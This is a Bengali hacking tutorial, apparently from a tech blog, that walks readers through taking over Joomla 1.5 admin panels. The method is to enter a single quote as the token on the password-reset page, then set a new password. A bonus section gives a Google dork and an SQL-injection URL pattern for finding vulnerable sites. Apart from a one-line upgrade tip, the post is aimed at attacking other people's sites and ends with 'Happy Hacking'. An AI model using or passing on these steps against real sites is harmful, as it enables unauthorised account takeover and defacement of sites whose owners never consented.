অনেকেরই দেখি হ্যাকিং এ প্রচণ্ড আগ্রহ তাই তাদের জন্য একটু টুকটাক লিখতে বসলাম আরকি। /আজকে আমি দেখাব জুমলার একটা সহজ Exploit. জুমলা সপর্কে আমরা সবাই কম বেশি যানি। জুমলা একটা CMS । আরো জানতে এই ঠিকানয় যানঃ http://joomla.com
যদি না জানেন তাহলে আপনার এই টিটোরিয়াল পড়ে কোন লাভ হবে না। কারন আপনি যা হ্যাক করতে চান তার সম্পর্কেই তো আপনি যানেন না।
প্রথমে একটা সাইট বের করুন যা জুমলা ১.৫.x দিয়ে বানানো। কারন এটা শুধুমাত্র জুমলার ১.৫ এর সকল ভার্সন এর ক্ষেত্রেই এই Method টা প্রজেয্য । অন্যান্য ভার্সন এর ক্ষেত্রে অন্য Exploit ব্যাবহার করতে হবে। ধরি একটা সাইট পেয়ে গেলেনঃ
এখন এই সাইটের এ্যডমিন প্যানেলঃ
http://aaaaaa.com/administrator
মানে আপনার প্রাপ্ত সাইটের শেষে /administrator লিখলেই পেজে যাবেন এ্যডমিন প্যানেল। এখন এখানে লগিন করতে আপনার Username এবং Password প্রয়োজন। এখন দেখব কিভাবে আমরা Username এবং পাসওয়র্ড পাব। J
আপনার প্রাপ্ত সাইটের শেষে এইটা লিখুন।
/index.php?option=com_user&view=reset&layout=confirm
তাহলে দারায়ঃ http://aaaaa.com/index.php?option=com_user&view=reset&layout=confirm
এখন আপনি পাসওয়র্ড রিসেট পেজ এ আছেন। এখানে টোকেন এর জায়গায় শুধুমাত্র এই চিনহ টা দিনঃ (‘)
বন্ধনি বাদে। এই চিনহ টা দেওয়ার পর আপনাকে একটা নতুন একটা পেজ এ নিয়ে যাবে। ওইখানে আপনি নতুন পাসওয়র্ড দিতে পারবেন। এখন আবার এ্যডমিন প্যানেলএ ফিরে গিয়ে আপনার দেওয়া নতুন পাসওয়র্ড দিয়ে লগিন করুন। 😉 আপনি এখন এ্যডমিন প্যানেল এ। আপনি চাইলে ডিলিট করতে পারেন । কোন নিউজ যোগও করতে পারেন আপনার ইচ্ছা।
তবে যে সাইটে নতুন একটা পেজএ নিয়ে যাবে না অথবা যদি লেখা আসে Token Invalid
তাহলে বুঝবেন ওই সাইটের জুমলা ভার্সন ১.৫ না। আমি আবারও বলসি এটা শুধুমাত্র জুমলা এর ১.৫ ভার্সন এর ক্ষেত্রে প্রযেজ্য।
বাচার উপায়ঃ
এখন যদি আপনার কোন জুমলা ১.৫ এর কোন সাইট থেকে এবং এই টোকেন Exploit এ হ্যাক করার মত হয় তাহলে আপনি যা করবেন। জুমলার নতুন ভার্সন এ আপগ্রড করুন। জুমলার নতুন ভার্সন পেতে এই ঠিকায়ান যানঃ http://joomla.com নতুন ভার্সনে এই বাগ Fix করা হয়েছে।
[বোনাস]
এইটা জুমলার SQL Injection Exploit এইটা শুধুমাত্র তাদের জন্য যারা SQL Injection পারেন।
গুগলে গিয়ে সার্চ দিন : "Powered by joomla" inurl:link_id"
এখন যে সাইটগুলা আসবেতার শেষের দিকটা এরকমঃ ?act=story_lists&task=item&link_id=1
যেমনঃ http://aaaaaa.com/?act=story_lists&task=item&link_id=1
এসকিউএল এরর: http://aaaaaa.com/?act=story_lists&task=item&link_id=%5BSQLi]
যেমনঃ http://aaaaaa.com/?act=story_lists&task=item&link_id=1’ [শেষে একটা স্ট্রিং দিন]
সবাইকে ধন্যবাদ। এখন যদি কেউ না পারেন না তাহলে মনোজগ দিয়ে চেস্টা করুন। হ্যাকিংটা এমন না যে আপনি একদিনেই পুরা বস হয়ে যাবেন। এর জন্য দরকার প্রুচুর ধৈ্র্য এবং সময়।
--::Good Luck::Happy Hacking::--
===[মারুফ আলম]===
আমি মারুফ আলাম। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 13 বছর 9 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 16 টি টিউন ও 296 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 1 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।
uid=0(root) gid=0(root) groups=0(root)
অনেক সুন্দর টিউন,
আপনি যত্ন করে টিউনটি লিখেছেন বলেই অনেক সুন্দর হইছে,
আপনাকে ধন্যবাদ টিউনের জন্য।